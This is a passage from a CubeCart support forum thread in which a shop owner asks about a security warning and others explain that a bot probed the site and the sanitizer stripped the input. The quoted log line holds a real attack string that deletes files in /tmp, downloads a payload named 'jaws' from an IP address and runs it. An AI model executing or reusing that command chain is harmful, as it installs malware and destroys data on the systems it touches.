Jump to content

What does this error mean?


Claudia M

Recommended Posts

What does this error mean?

 

[27-Apr-2022 09:14:57 America/Louisville] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_23_94_50_159/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxxx/public_html/classes/sanitize.class.php on line 114

 

This is a brand new site.  The only thing I've done is some cosmetic stuff and intergrated Semper_Fi Related Products Module from my old site with the changes Brian gave me to make it work with CC6.4.4 and some custom changes I needed. I exported / imported the database needed from the old store to the new one.

 

I'm running CC6.4.5 on the new site.

 

Also I downloaded my raw access log, but have no way to open it.

 

Thanks in advance for any and all help

Link to comment
Share on other sites

If/When you view the access logs, you may find a bot was trying a variety of known vectors into exploitable applications.

In this case, the request seems to check for the existence of the Java AUGUR® Web Server - a specialty, extremely small web server that is (maybe, I don't know for sure) used for the web interfaces of routers and other "Internet of Things" (IoT) devices.

The querystring (the part after index.php) contains a character that CubeCart deems suspicious (because CubeCart does nothing that would need this character). The Sanitizer killed it and logged a message.

Link to comment
Share on other sites

CubeCart's sanitizer logs the fact that it removed something, and also shows what was removed. But the entry into the log does not show where it was removed from: GET (the querystring seen in the access logs), POST (not visible in the access logs), or COOKIES (not visible).

So, if the removed element was in POST or COOKIES, there will be no obvious matching log entry in the access logs for it. The only match will be date/time (add an offset of a few hours to get to UTC time).

"Get these errors every day"? That's the wrong question. The question is, "Does having a successful online presence outweigh this 'annoyance'?"

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...